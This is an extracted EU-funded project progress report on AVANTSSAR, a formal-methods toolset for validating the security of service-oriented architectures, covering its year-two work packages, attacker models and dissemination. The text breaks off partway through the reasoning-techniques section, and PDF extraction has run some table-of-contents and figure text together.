PROJECT PERIODIC REPORT - avantssar.euavantssar.eu/pdf/deliverables/avantssar-ppr-P2.pdf · 3.1.5...

PROJECT PERIODIC REPORT

Grant Agreement number: 216471

Project acronym: AVANTSSAR

Project title: Automated Validation of Trust and Security of Service-oriented Architectures

Funding Scheme: Small/medium-scale focused research project (STREP), Seventh Framework Programme, Theme ICT-1.1.4

Date of latest version of Annex I against which the assessment will be made: 17 / 10 / 07

Periodic report: 1st □ 2nd √ 3rd □

Period covered: from 01 / 01 / 09 to 31 / 12 / 09

Name, title and organisation of the scientific representative of the project's coordinator:

Prof. Luca Vigano` Universita` Degli Studi Di Verona Department of Computer Science Strada le Grazie 15 37134 Verona Italy

Mobile: +39 320 4251233

Tel: +39 0458027070

Fax: +39 0458027068

E-mail: [email protected]

Project website address: www.avantssar.eu

Automated VAlidatioN of Trust and Securityof Service-oriented ARchitectures

FP7-ICT-2007-1, Project No. 216471

www.avantssar.eu

Deliverable D1.4Progress/Assessment Report for Year 2

(Period P2: 01.01.09 — 31.12.09)

AbstractThis Periodic Progress Report covers the second year of the AVANTSSARproject. It consists of a publishable executive summary, of an overview of theproject objectives for the period and of the work progress and the achieve-ments during the period, of the deliverables and milestones, of a summary ofthe project management including an explanation of the use of the resourcesand the corresponding financial statements.

Deliverable detailsDeliverable version: v1.1 Classification: publicDate of delivery: 18.04.2010 (v1.0: 05.02.2010) Due on: 05.02.2010Editors: all Total pages: 165

Project detailsStart date: January 01, 2008 Duration: 36 monthsProject Coordinator: Luca ViganòPartners: UNIVR, ETH Zurich, INRIA, UPS-IRIT, UGDIST, IBM,

OpenTrust, IEAT, SAP, SIEMENS

D1.4: Progress/Assessment Report for Year 2 (Period P2: 01.01.09 —31.12.09) 2/165

FP7-ICT-2007-1Project No. 216471


Contents1 Publishable summary 10

1.1 Project objectives and main expected results . . . . . . . . . . 101.2 Project impact . . . . . . . . . . . . . . . . . . . . . . . . . . 121.3 Achievements and main results so far . . . . . . . . . . . . . . 121.4 Dissemination and use so far . . . . . . . . . . . . . . . . . . . 14

2 Project objectives for the period 15

3 Work progress and achievements during the period 163.1 Work progress and achievements by WP . . . . . . . . . . . . 16

3.1.1 WP2: Modeling trust and security aspects of service-oriented architectures . . . . . . . . . . . . . . . . . . 16

3.1.2 WP3: Automated reasoning techniques . . . . . . . . 183.1.3 WP4: Validation Platform . . . . . . . . . . . . . . . 263.1.4 WP5: Proof of concept . . . . . . . . . . . . . . . . . 283.1.5 WP6: Dissemination and industry migration . . . . . 34

3.2 Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42

4 Deliverables and milestones tables 434.1 Deliverables list . . . . . . . . . . . . . . . . . . . . . . . . . . 43

4.1.1 Deliverable D1.4 . . . . . . . . . . . . . . . . . . . . . 454.1.2 Deliverable D2.2 . . . . . . . . . . . . . . . . . . . . . 464.1.3 Deliverable D4.1 . . . . . . . . . . . . . . . . . . . . . 474.1.4 Deliverable D6.1 . . . . . . . . . . . . . . . . . . . . . 48

4.2 Milestones list . . . . . . . . . . . . . . . . . . . . . . . . . . . 49

5 Project Management 515.1 Project Planning and Timetable (GANTT Chart) . . . . . . . 515.2 Project Management and Coordination . . . . . . . . . . . . . 51

5.2.1 Project Meetings . . . . . . . . . . . . . . . . . . . . . 515.2.2 Task-forces . . . . . . . . . . . . . . . . . . . . . . . . 535.2.3 Website . . . . . . . . . . . . . . . . . . . . . . . . . . 535.2.4 Mailing lists . . . . . . . . . . . . . . . . . . . . . . . . 545.2.5 SVN Server . . . . . . . . . . . . . . . . . . . . . . . . 55

5.3 Use of foreground and dissemination activities . . . . . . . . . 555.3.1 Project Workshops and Conferences, Lectures, Tutorials 555.3.2 European and international projects and working groups 56

5.4 Involvement of project participants in scientific events . . . . . 615.5 AVANTSSAR publications and drafts . . . . . . . . . . . . . . 67



5.6 AVANTSSAR theses . . . . . . . . . . . . . . . . . . . . . . . 715.7 AVANTSSAR talks and presentations . . . . . . . . . . . . . . 72

6 Explanation of the use of the resources 796.1 Resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 806.2 Explanation of personnel costs, subcontracting and any major

direct costs . . . . . . . . . . . . . . . . . . . . . . . . . . . . 956.3 General project meetings . . . . . . . . . . . . . . . . . . . . . 122

6.3.1 First AVANTSSAR Workshop and First Review Meeting1226.3.2 ASLan v.2 Meeting . . . . . . . . . . . . . . . . . . . 1236.3.3 2nd Synchronization Meeting . . . . . . . . . . . . . . 1246.3.4 WP4 Meeting . . . . . . . . . . . . . . . . . . . . . . . 125

6.4 Working meetings . . . . . . . . . . . . . . . . . . . . . . . . . 1266.4.1 Definition and application of a distributed temporal

logic for the analysis of security protocols and services 1266.4.2 Technical meeting on WP5: SAML SSO . . . . . . . . 1276.4.3 Meeting on model-checking for authorization policies . 1286.4.4 Meeting on orchestration work . . . . . . . . . . . . . . 1296.4.5 Working Meeting on WP6.2: SAP NW BPM . . . . . . 1306.4.6 Meeting on secure pseudonymous channels . . . . . . . 1316.4.7 Definition and application of a distributed temporal

logic for the analysis of security protocols and services 1326.4.8 AVANTSSAR technical synchronization meeting onWP4

and WP6 . . . . . . . . . . . . . . . . . . . . . . . . . 1336.4.9 Working Meeting on Dynamic Policies, Services, and

Composition . . . . . . . . . . . . . . . . . . . . . . . . 1346.4.10 Working Meeting on WP2 and WP3 . . . . . . . . . . 1356.4.11 Working Meeting on WP4 and WP5 . . . . . . . . . . 1366.4.12 Working Meeting on WP6.2: SAP NW NGSSO and

SAP NW BPM . . . . . . . . . . . . . . . . . . . . . . 1376.5 Participation to European and scientific events . . . . . . . . . 138

6.5.1 6th ACM Workshop on Formal Methods in SecurityEngineering (FMSE 2008) co-located with ComputerCommunication Security . . . . . . . . . . . . . . . . . 138

6.5.2 ARES’09 . . . . . . . . . . . . . . . . . . . . . . . . . . 1396.5.3 ARSPA-WITS’09 and working meeting at Imperial Col-

lege . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1406.5.4 IWSP 2009, 17th International Workshop on Security

Protocols . . . . . . . . . . . . . . . . . . . . . . . . . 1416.5.5 Future Internet Conference Prague 2009 . . . . . . . . 142



6.5.6 Applied Cryptography and Network Security, 7th In-ternational Conference . . . . . . . . . . . . . . . . . . 143

6.5.7 9th International School on Formal Methods for theDesign of Computer, Communication and Software Sys-tems: Web Services (SFM-09:WS) . . . . . . . . . . . . 144

6.5.8 Cinquièmes Journées Francophones MODÈLES FORMELSde l’INTERACTION (MFI’09) . . . . . . . . . . . . . 145

6.5.9 Conference on Automated Reasoning with Analytic Tableauxand Related Methods (Tableaux) and Workshop onFirst-Order Theorem Proving (FTP) 2009 . . . . . . . 146

6.5.10 Logic Colloquium 2009 . . . . . . . . . . . . . . . . . . 1476.5.11 9th International School on Foundations of Security

Analysis and Design (FOSAD) . . . . . . . . . . . . . . 1486.5.12 6th International Conference on Trust, Privacy and Se-

curity in Digital Business (TrustBus’09) . . . . . . . . 1496.5.13 12th International Information Security Conference 2009

1506.5.14 Summer School on Provable Security . . . . . . . . . . 1516.5.15 ESORICS’09 . . . . . . . . . . . . . . . . . . . . . . . 1526.5.16 4th International Conference on Risks and Security of

Internet and Systems 2009 (CRISIS 2009) . . . . . . . 1536.5.17 Stabilization, Safety, and Security of Distributed Sys-

tems, 11th International Symposium, SSS 2009 . . . . 1546.5.18 FAST’09 . . . . . . . . . . . . . . . . . . . . . . . . . . 1556.5.19 Methods for Modalities (M4M 2009) . . . . . . . . . . 1566.5.20 FIA Stockholm andWorkshop with the SHIELDS Project157

7 Planned work for the next reporting period 158

8 Financial statements – Forms C and Summary financial re-port (signed originals sent in parallel by post) 161

9 Certificates (signed originals sent in parallel by post) 162



List of Figures1 The AVANTSSAR Validation Platform and its usage towards

Enterprise SOA (TS abbreviates Trust and Security). . . . . . 112 The SAML Modeling Environment. . . . . . . . . . . . . . . . 393 The SAML Modeling Environment: pop-up warning. . . . . . 404 The SAML Modeling Environment: validation feature. . . . . 415 GANTT Chart of the AVANTSSAR Project . . . . . . . . . . 52



List of Tables1 Application areas and the related families of problem cases. . . 302 Deliverables . . . . . . . . . . . . . . . . . . . . . . . . . . . . 443 Milestones (and decision points) . . . . . . . . . . . . . . . . . 504 Total resources for Period P2. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 815 Total resources for Period P2 (full table, part 1/3). . . . . . . . . . . . . . . . . 826 Total resources for Period P2 (full table, part 2/3). . . . . . . . . . . . . . . . . 837 Total resources for Period P2 (full table, part 3/3). . . . . . . . . . . . . . . . . 848 Resources for Period P2: UNIVR . . . . . . . . . . . . . . . . 859 Resources for Period P2: ETH Zurich . . . . . . . . . . . . . . 8610 Resources for Period P2: INRIA . . . . . . . . . . . . . . . . . 8711 Resources for Period P2: UPS-IRIT . . . . . . . . . . . . . . . 8812 Resources for Period P2: UGDIST . . . . . . . . . . . . . . . 8913 Resources for Period P2: IBM . . . . . . . . . . . . . . . . . . 9014 Resources for Period P2: OpenTrust . . . . . . . . . . . . . . 9115 Resources for Period P2: IEAT . . . . . . . . . . . . . . . . . 9216 Resources for Period P2: SAP . . . . . . . . . . . . . . . . . . 9317 Resources for Period P2: SIEMENS . . . . . . . . . . . . . . . 9418 Total costs for Period P2 . . . . . . . . . . . . . . . . . . . . . 9619 Costs for Period P2: UNIVR . . . . . . . . . . . . . . . . . . . 9720 Costs for Period P2: UNIVR adjustment . . . . . . . . . . . . 9821 Costs for Period P2: UNIVR (details) . . . . . . . . . . . . . . 9922 Costs for Period P2: ETH Zurich . . . . . . . . . . . . . . . . 10023 Costs for Period P2: ETH Zurich (details) . . . . . . . . . . . 10124 Costs for Period P2: INRIA . . . . . . . . . . . . . . . . . . . 10225 Costs for Period P2: INRIA (details) . . . . . . . . . . . . . . 10326 Costs for Period P2: University of Nancy . . . . . . . . . . . . 10427 Costs for Period P2: UPS-IRIT . . . . . . . . . . . . . . . . . 10528 Costs for Period P2: UPS-IRIT (details) . . . . . . . . . . . . 10629 Costs for Period P2: CNRS . . . . . . . . . . . . . . . . . . . 10730 Costs for Period P2: CNRS (details) . . . . . . . . . . . . . . 10831 Costs for Period P2: UGDIST . . . . . . . . . . . . . . . . . . 10932 Costs for Period P2: UGDIST (details) . . . . . . . . . . . . . 11033 Costs for Period P2: IBM . . . . . . . . . . . . . . . . . . . . 11134 Costs for Period P2: IBM (details) . . . . . . . . . . . . . . . 11235 Costs for Period P2: OpenTrust . . . . . . . . . . . . . . . . . 11336 Costs for Period P2: OpenTrust (details) . . . . . . . . . . . . 11437 Costs for Period P2: IEAT . . . . . . . . . . . . . . . . . . . . 11538 Costs for Period P2: IEAT (details) . . . . . . . . . . . . . . . 11639 Costs for Period P2: SAP . . . . . . . . . . . . . . . . . . . . 117



40 Costs for Period P2: SAP adjustment . . . . . . . . . . . . . . 11841 Costs for Period P2: SAP (details) . . . . . . . . . . . . . . . 11942 Costs for Period P2: SIEMENS . . . . . . . . . . . . . . . . . 12043 Costs for Period P2: SIEMENS (details) . . . . . . . . . . . . 12144 Deliverables due in Period P3 . . . . . . . . . . . . . . . . . . 15945 Milestones (and decision points) of Period P2 . . . . . . . . . 160



1 Publishable summary1.1 Project objectives and main expected resultsDriven by rapidly changing requirements and business needs, IT systemsand applications are undergoing a paradigm shift: components are replacedby services distributed over the network, and composed and reconfigureddynamically in a demand-driven way into service-oriented architectures.

Deploying services in future network infrastructures entails a wide rangeof trust and security issues. Solving them is extremely hard since making theservice components trustworthy is not sufficient: composing services leads tonew subtle and dangerous vulnerabilities due to interference between compo-nent services and policies, the shared communication layer, and applicationfunctionality. Thus, one needs validation of both the service components andtheir composition into secure service architectures.

AVANTSSAR proposes a technology for the formal specification and Au-tomated VAlidatioN of Trust and Security of Service-oriented ARchitectures.This technology will include an integrated toolset, the AVANTSSAR Valida-tion Platform, which will be tuned on relevant industrial case studies. Morespecifically, the project will develop:

• ASLan, the first formal language for specifying trust and security prop-erties of services, their associated policies, and their composition intoservice architectures.

• Automated techniques to reason about services, their associated secu-rity policies, and their dynamic composition into secure service archi-tectures.

• The AVANTSSAR Validation Platform, an automated toolset for vali-dating trust and security aspects of service-oriented architectures, de-picted in Figure 1.

• A library of validated composed services and service architectures,proving that the AVANTSSAR technology scales to the envisaged ap-plications.

Migrating project results to industry and disseminating them to standardiza-tion organizations will speed up the development of new network and serviceinfrastructures, enhance their security and robustness, and increase the pub-lic acceptance of emerging IT systems and applications based on them.



Vu

lner

ab

ilit

y

: P

oli

cy:

To

ol

inp

ut/

ou

tpu

tP

: T

rust

an

d S

ecu

rity

TS

: C

om

po

sed

Ser

vic

eC

S:

Co

mp

ose

d P

oli

cyC

P:

Ser

vic

eS

insecure

P

Po

licy

Co

mp

ose

d s

ervi

ce/p

oli

cy

CP

CS

Sec

ure

d s

ervi

ce/p

oli

cy

TS

Wra

pp

er

CS

CP

secu

re

Ser

vice

s

feed

ba

ck

BP

MN

+ A

nn

ota

tio

ns

CO

NN

BP

EL

+ A

nn

ota

tio

ns

CO

NN

CO

NNA

nB

CO

NN

EC

TO

R

AS

La

n v

.2

orc

hes

tra

tio

n/

com

po

siti

on

vali

da

tio

np

rob

lem

TS

VA

LID

AT

OR

AS

La

n v

.1.1

AS

La

n v

.1.1

TS

OR

CH

ES

TR

AT

OR

Sp

ecif

ica

tio

n o

f th

e a

vail

ab

le s

ervi

ces

(new

) S

ervi

ce s

pec

ifie

d

TS

Wra

pp

er

Th

e A

VA

NT

SS

AR

Va

lid

ati

on

Pla

tfo

rm

Figu

re1:

The

AVANTSS

AR

Valid

ationPlatform

andits

usag

etowa

rdsE

nterprise

SOA

(TSab

breviatesT

rust

and

Security).



1.2 Project impactThe main impact targets are industry, research institutions, and standardiza-tion bodies working on the design of Web Services and service-oriented archi-tectures, focussing in particular on their trust and security aspects. Since theEuropean Society as a whole will ultimately benefit from the results of theproject (in terms of increased reliability and acceptance of, and confidencein, service-oriented architectures, in particular in e-health, e-government, e-market, etc.), special measures are planned to reach the public.

1.3 Achievements and main results so farAll the project objectives for the second reporting period have been success-fully achieved. The following are the main results we obtained:

Modeling trust and security aspects of service-oriented architecturesWe have defined two versions of the AVANTSSAR Specification Lan-guage (ASLan), which will allow one to formally model trust andsecurity-related aspects of service-oriented architectures to be validatedby the AVANTSSAR Validation Platform. ASLan v.1 (and its exten-sion ASLan v.1.1) supports the formal modeling of trust and security-related aspects of the basic building blocks of service-oriented archi-tectures. ASLan v.2 allows for the formal specification of static ser-vice and policy composition, and it borrows notions from proceduraland objected-oriented programming languages in order to be usableby those who are not an expert in formal protocol/service specifica-tion languages. ASLan v.2 is a more high-level language than ASLanv.1, and the AVANTSSAR Validation Platform accepts as input spec-ifications written in either ASLan v.2 or ASLan v.1/ASLan v.1.1 (inthe former case, the specification is automatically translated into a“platform-internal” ASLan v.1.1 specification), so that the formal val-idation of the input problem can be carried out.

Automated reasoning techniques We have been developing a numberof techniques to automatically reason about services and policies for-mally specified using ASLan. These techniques allow for satisfiabilitychecking of ASLan policies, for model checking of ASLan services withrespect to policies and for compositional reasoning for services and poli-cies. Automated reasoning about a variety of attacker models is alsosupported, as well as a number of abstraction techniques for composedservices and policies.



AVANTSSAR Validation Platform We have implemented a prototypeof the AVANTSSAR Validation Platform as a service-oriented archi-tecture. The platform takes as input a policy stating the functionaland security requirements of a goal service and a description of theavailable services (including a specification of their security-relevantbehavior, possibly including the local policies they satisfy) and appliesautomated reasoning techniques in order to build an orchestration ofthe available services that meets the security requirements stated inthe policy. The platform comprises of two main components: the Or-chestrator tries to build an orchestration, i.e. a composition, of theavailable services in a way that is expected (but not yet guaranteed) tosatisfy the input policy; the Validator automatically analyses the vali-dation problem resulting from the Orchestrator output, where a failedvalidation means the existence of vulnerabilities that need to be fixed;otherwise, the composition of the services is guaranteed to be secure,i.e. to meet the input policy.

Proof of concept We have begun the selection and formalization of industry-relevant problem cases as ASLan specifications and their validationusing the verification tools developed within the project.We have formalized 6 case studies and validated 13 problem cases,thus covering all proposed areas and a large majority of the targetedproblem cases. This evaluation phase has been instrumental in severalrespects. In terms of formalization we have confirmed the suitability ofour specification language and refined several choices. For validationand orchestration, we have tested the new features incorporated intothe tools, notably the handling of policies and dynamicity. In terms ofperformance, the tools have successfully handled all case studies, someof which were quite large; however, some verification problems havetested the limits of the tool set; these have required manual adaptationof the model or have been handled only by some of the tools. Con-sequently, we are undertaking optimizations both of the ASLan v.2 toASLan v.1.1 translator and of the back-ends.

Dissemination and industry migration Dissemination and migration ofthe project results into the scientific community, standardization orga-nizations and industry is well underway. In particular, contacts withcore business units at the industrial partners of AVANTSSAR havebeen been consolidated and a number of valuable migration activitieshave been carried out: the application of AVANTSSAR to formally an-alyze the SAP NetWeaver SAML Next Generation Single Sign On ser-



vices; the exploitation of AVANTSSAR technology to formally analyzesecurity-critical aspects of business processes within the SA; NetWeaverBPM product solution; the application of AVANTSSAR languages andtechniques to service-oriented architectures developed at IBM; integra-tion of AVANTSSAR technology into the service-oriented applicationsdeveloped at OpenTrust.

1.4 Dissemination and use so farAVANTSSAR represents an unprecedented effort to apply automated valida-tion methods to trust and security aspects of service-oriented architecturescomprising of composed services, and it has therefore been generating quitea large interest in both academia and industry. Dissemination and use offoreground thus have a high priority and we have planned appropriate mea-sures to ensure an effective and timely dissemination of the project resultsto potential users, both at the European level and world-wide.

During the second year, the project participants produced 30 papers pub-lished or currently in print about the project’s foreground (amounting to 49papers since the start of the project), and 7 more papers are currently submit-ted. Further papers are in preparation. Foreground and other informationrelated to AVANTSSAR have been presented in 45 (87 in total) talks, pre-sentations and demos by project participants. Moreover, AVANTSSAR hassupported or been involved in, through the participants, 40 (74 in total)scientific events about topics directly related to the project.

More information (including project details, deliverables, publications,software, news, press-kits and a demo video of the vulnerability of the SAML-based Single Sign-On service for Google Apps that we discovered in the courseof the first project year) is available at

www.avantssar.eu



2 Project objectives for the periodThe technical objectives of the project in the second reporting period were:

• Definition of Version 2 of the AVANTSSAR Specification Language(ASLan v.2) for the specification of security-sensitive service-orientedarchitectures, the associated security policies, and their trust and se-curity properties. In particular, ASLan v.2 should allow for the formalspecification of static service and policy composition.

• The development of techniques for satisfiability checking of ASLan poli-cies, for model checking of service-oriented architectures with respectto policies, for the analysis of web service security under different at-tacker models, for compositional reasoning for services and policies,and for the validation of composed services and policies with the helpof different abstraction approaches.

• Design and prototypical implementation of the AVANTSSAR Valida-tion Platform v. 1.

• Formalization of industry-relevant problem cases as ASLan specifica-tions and their validation using the verification tools developed withinthe project.

• Dissemination and migration of the project results into the scientificcommunity, industry and standardization bodies. In particular, in thesecond reporting period, the project should start the the migration ofits technologies to the industrial development environments of IBM,OpenTrust and SAP.

As illustrated in the following sections in more detail, these objectiveshave been fully achieved.



3 Work progress and achievements during theperiod

3.1 Work progress and achievements by WP3.1.1 WP2: Modeling trust and security aspects of service-oriented

architectures

Workpackage Objective The objective is the definition of the syntaxand semantics of the AVANTSSAR Specification Language (ASLan), whichwill allow one to formally model trust and security-related aspects of service-oriented architectures to be validated by the AVANTSSAR Validation Plat-form.

Workpackage AchievementsWP2.1 Atomic services and non-composed policies This subworkpack-

age is dedicated to the definition of ASLan v.1, which allows for spec-ification of atomic services and non-composable policies. The work onthis subworkpackage has finished in the first year of the project (seeDeliverable D2.1 [AVA08b]).

WP2.2 Static service and policy composition The objective of this sub-workpackage consists in extending ASLan so to allow for static com-position of services and policies. The extended version of ASLan, i.e.ASLan v.2, borrows notions from procedural and objected-oriented pro-gramming languages in order to be usable by those who are not expertin formal protocol/service specification languages.The following features of ASLan v.2 are in particular useful in formallymodeling static services and policy compositions:

• Control flow constructs (e.g. while and if). These allow for spec-ifying services in a concise manner using concepts familiar to mostprogrammers.

• Modularity via the notion of an entity. This allows for specify-ing services separately, and instantiating them multiple times orcomposing them with other services. Moreover, modularity helpsin localizing policies to individual services, and precisely mappingout their trust relations.

• Annotated channels. These provide an intuitive notation for ex-pressing properties of communication channels that are used bothas service assumptions and service goals.



ASLan v.2 is translated to ASLan v.1.1, which is in turn an extension ofASLan v.1. The translation defines the semantics of ASLan v.2. ASLanv.1.1 consists in a number of technical improvements over ASLan v.1.In particular, it introduces the notion of macro steps which allows forabstracting from internal computations of honest services.

WP2.3 Dynamic service and policy composition The objective of thissubworkpackage is to further extend ASLan capability of expressingstatic composition of services and policies to dynamic composition.The work on this subworkpackage has recently started and the result-ing language ASLan v.3 will be described in deliverable D2.3. In orderto simplify terminology and ease the use of the AVANTSSAR Platform,we will deploy the languages with the following simple names:

• the lower-level specification language (currently ASLan v.1/ASLanv.1.1) will be simply called ASLan,

• the higher-level specification language (currently ASLan v.2/ASLanv.3) will be simply called ASLan++.

Dynamic service composition in the context of AVANTSSAR refers tothe situation where the services choose their partners at run time, andtherefore the composition of services is not fixed a priori. The typicaldynamic binding scenario envisioned, e.g., in the Universal Descrip-tion, Discovery and Integration (UDDI) standard [Con] would be aninstance of dynamic composition of services: Web servers announcetheir services and their interface requirements on a service broker, andthen clients can look up the broker’s directory in order to determinewhich of the services advertised there satisfy their policies. After thisservice discovery phase, clients would bind to suitable (if any) serviceproviders. The AVANTSSAR Platform can be used to validate the se-curity requirements of service providers, their clients, and the channelsconnecting them, determined in such dynamic scenarios.Dynamic policies in the context of AVANTSSAR refer to the situa-tion where security policies that govern services and their compositiondepend on the state of the services, and can therefore change whilethe services evolve. For instance, in the context of administrativeRBAC [Cra05], Alice may have the role user in a state S, and upgradeto role manager in the next state S ′, due to some conditions (e.g. theadministrator decides that since all the managers are on vacation instate S ′, Alice should take the manager role). The authorization rights



of Alice correspondingly evolve when moving from S to S ′. The poli-cies governing the system in S is therefore different from those in S ′.The AVANTSSAR Platform can be used to validate the security re-quirements of services and their policies, determined in such dynamicscenarios.

3.1.2 WP3: Automated reasoning techniques

Workpackage Objective The objective is the development of reasoningtechniques and of theoretical results that will be implemented in WP4 in theAVANTSSAR Validation Platform. These techniques will focus on the logicsand models defined using the ASLan language developed in WP2.

Workpackage Achievements

WP3.1 Satisfiability of ASLan policies. Policies have been consideredat several levels:

Trust negotiation and access control. We have continued the workon the logical modeling of access control systems. Our emphasisthis year was on the expression of different kinds of delegation ina distributed environment. We have also formalized trust negotia-tion as a functionality that can be called by agents before enteringa task or executing an action. These advances are part of Marwael Houri’s PhD Thesis (partially funded by AVANTSSAR) andhave been published in [9, 10].Moreover, in the manuscript [35] Mounira Kourjieh and YannickChevalier have investigated conditions under which the entailmentproblems for ASLan-like sets of clauses are decidable. They pro-pose an ordered saturation procedure similar to the one in [BG01]though with less restriction on the possible orderings such that,whenever it terminates, it outputs a set of clauses for the groundentailment problems, and thus the problem of deciding whether atransition is applicable in ASLan, is decidable.

Request message analysis and response synthesis. Given the spec-ification of a communication scenario between two or more peersone would like to know, first, whether this scenario is imple-mentable, and second find the specification of a secure implemen-tation. The first problem was treated in [CMR08] to obtain ex-ecutable Web Services Orchestration scenarios. The second wasconsidered in the context of security protocol compilation as the



problem of interpreting Alice and Bob specifications and was ad-dressed independently by [24] and [17]. In contrast to previousapproaches to defining a formal language based on Alice and Bobnotation, these works define the semantics with respect to an ar-bitrary algebraic theory of the cryptographic primitives. In fact,both works essentially arrive at equivalent definitions of a formalAnB language (although the presentation differs). Note that, dueto the generality, this semantics comprises some problems thatare undecidable for arbitrary algebraic theories. [24] shows thatthese problems are solvable for the theories of exponentiation andexclusive or, while [17] gives a more general account and relatesthe decision problems to static equivalence so that existing resultscan be used. [24] is the basis of the AnB language that IBM usesas an ISSL (see also description of WP6), while the orchestratoris based on the methods of [17].

Resolution of structural constraints. We have extended in [16] thework of [CMR08] to take into account the properties of the orches-trated services and ordering constraints between different actions.In this work the, structural constraints are implemented by certifi-cates sent and received along the messages, and the orchestrationproblem is entirely based on the payload of the messages and cer-tificates.We have also considered a more traditional approach to orchestra-tion in which the services are abstracted as conditional commu-nicating automata. In this setting, the orchestration problem isparameterized both by the communication model and the relationbetween the goal service and the orchestrated one.We have considered the standard relations between the goal andthe orchestrated service, i.e., trace inclusion, trace equivalence,simulation and bisimulation. For each of these relations, we havestudied the decidability of the orchestration problem when theport size is unbounded. Besides the decidability results obtained[39], we have proposed three variants of the initial model: a simpli-fied version in [BCF07, BCDP08], with bounded ports and asyn-chronous communications in [BCF08b, BCF08a, 12, 11], and withsynchronous communications [13]. In the latter case, we haveadditionally considered Quality of Service constraints in the or-chestration.

Negotiation Strategies UNIVR [33] has recently begun working onthe formalization and implementation of strategies for meaning



negotiation, the general process with which two agents reach anagreement about the meaning of a set of terms: each agent dis-cusses with the other one her viewpoint by exhibiting it in anactual set of constraints on the meaning of the negotiated terms.Such an approach will have a direct application to the case whereagents negotiate policies without the help of a broker/mediator.

WP3.2 Model-checking of ASLan services with respect to policies.

Bounded model checking. We have developed a bounded model-checking technique for ASLan. We have extended the techniquedescribed in [ACC07, AC08], providing support for model checkingof LTL formulae as described in [BCCZ99]. We have also extendedthe SAT encoding technique for supporting the Horn clauses.We have also evaluated the use of the action language C that allowsfor a natural and concise modeling of processes and the associatedsecurity policies [4]. In particular, C provides a rich and naturalspecification framework for the formal specification of processesand the associated security policy by supporting a wide varietyof features, e.g., noninertial and exogenous facts, nondetermin-ism, indirected and conditional effects, implicit preconditions. [4]shows that the use of C greatly simplifies the specification stepoffering a rich and concise way to model desired features of busi-ness processes under authorization constraints. As a result, wewill evaluate extensions of ASLan to enhance its expressivenesstowards some key features of C. The extensions of the languagewill be then supported by bounded model checking techniques forthe automatic analysis of the resulting specification.

Logic-based Validation of Service Oriented Applications. Thespecification of distributed service-oriented applications spans sev-eral levels of abstractions encompassing their workflow and accesscontrol policies. These levels may interact in subtle ways andidentifying a suitable language able to describe this interplay isa difficult task. Even more so, the verification of formal modelsfeaturing both levels and their interplay; almost all of the avail-able works in the literature address at most one level at a time andsometimes using coarse abstractions. For example, the verificationof the workflows specified in BPEL is done by using (extensionsof) Petri nets where the data manipulations are abstracted away.



To overcome these problems, in [14, 31], we propose a declara-tive two-level framework for the formal specification of SOA ap-plications in the context of a first-order temporal logic extendedwith theories. This provides a rich and uniform framework wherecomplex systems can be naturally specified and it is possible toidentify conditions which are sufficient for the automated analy-sis of specifications. For example, we were able to characterizethe decidability of the symbolic execution of some classes of SOAapplications, which is interesting for the scenario validation anddebugging. We have started developing a tool (eventually to beintegrated into the AVANTSSAR Platform) that integrates state-of-the-art automated reasoning technologies in order to providesupport for the mechanization of this framework. In future work,we will study techniques to approximate the logic programmingsemantics (especially, negation as failure) of policy languages inour purely declarative framework and investigate ways to adaptexisting techniques for the synthesis of invariants which will beuseful both to the workflow and policy level.

WP3.3 Attacker models. We have extended and refined the standard Dolev-Yao attacker of security protocol analysis in order to capture new as-pects of web service security:

Hierarchy of compromising attackers. In the first project year,we developed a hierarchy of compromising attackers in a sym-bolic framework. In the second year, we built on this frameworkby exploring the relation between our attacker models in the sym-bolic, possibilistic setting (as used within our project) and theircomputational counterparts from the cryptographic, probabilis-tic setting. This has clarified the relation between attackers fromboth settings, revealing subtle differences that had previously goneunnoticed and revealed many missed cased in published crypto-graphic proofs. The new insights can help to improve the guar-antees provided by the AVANTSSAR Platform, and make theirrelation to cryptographic proofs explicit.

Multi-attacker. In the first year of the project, we formalized a newthreat model, referred to as the General Attacker (GA), which fea-tures each protocol participant as a potential Dolev-Yao attackerwho does not necessarily collude or share knowledge with anyoneelse. During the second year, we have refined this concept andwe have devised a variant of it, referred to as the Multi-Attacker



(MA), which differs from GA in preventing each protocol partici-pant from colluding or sharing knowledge with anyone else.As in GA, also in MA it is meaningful to continue the analysis ofa protocol after an attack is mounted. This can assess whetheradditional attacks can be mounted either by the same attackeror by different attackers. Even novel scenarios whereby principalsattack each other become possible. A significant scenario is thatof retaliation, where an attack is followed by a counterattack.The work has been consolidated on the NSPK protocol and ex-perimented on the SAML-based SSO for Google Apps use caseto have some evidence of the scalability of the approach. Thisresearch topic led to two publications [7, 8].

Guessing attacks. Continuing work started in the first project year,we have formalized a calculus to model guessing attacks. Thecentral concept is to view cryptographic functions as oracles thatcan be used either off-line, if known by the adversary, or on-line, byemploying protocol participants for this purpose. Oracles can beeither observed or controlled by the adversary, giving rise to severalcases when an attacker can guess, formalized in a guessing lemma,which also gives bounds on the number of oracle accesses neededfor guessing. The guessing rules can be used in reasoning togetherwith standard Dolev-Yao intruder rules. We have modeled ourguessing rules in ASLan as supplementary transition steps thatcan be added to any model, and have successfully substantiatedknown guessing attacks on protocols such as Anderson-Lomas,MS-CHAP and NTLM. Moreover, for an ATM system modeledafter a real case we have both reproduced known guessing attacksand found new ones.

Attacker on Access Control Systems. We have considered a vari-ant of the standard Dolev-Yao intruder model specialized for theanalysis of the security of the trust negotiation mechanisms. Theseresults will soon be reported on in a paper.

Communication channels. Continuing our work on pseudonymoussecure channels [25, 26], we have both considered their integrationinto the specification languages ASLan v.2 and AnB (see WP6)and into the model-checking methods. The latter is relativelystraightforward, since the channels are expressed using standardASLan v.2/ASLan v.1 constructs that the tools already support.The work on compositional reasoning for channels is describedbelow.



Zero Knowledge Proofs. Further progress has been made on theformalization and model-checking systems that use zero knowl-edge proofs as a cryptographic primitive (like the Identity Mixercase study). In particular, we can avoid the non-trivial algebraicreasoning required by existing work, and also we can handle rela-tions on credential attributes [37].

WP3.4 Compositional reasoning for services and policies.

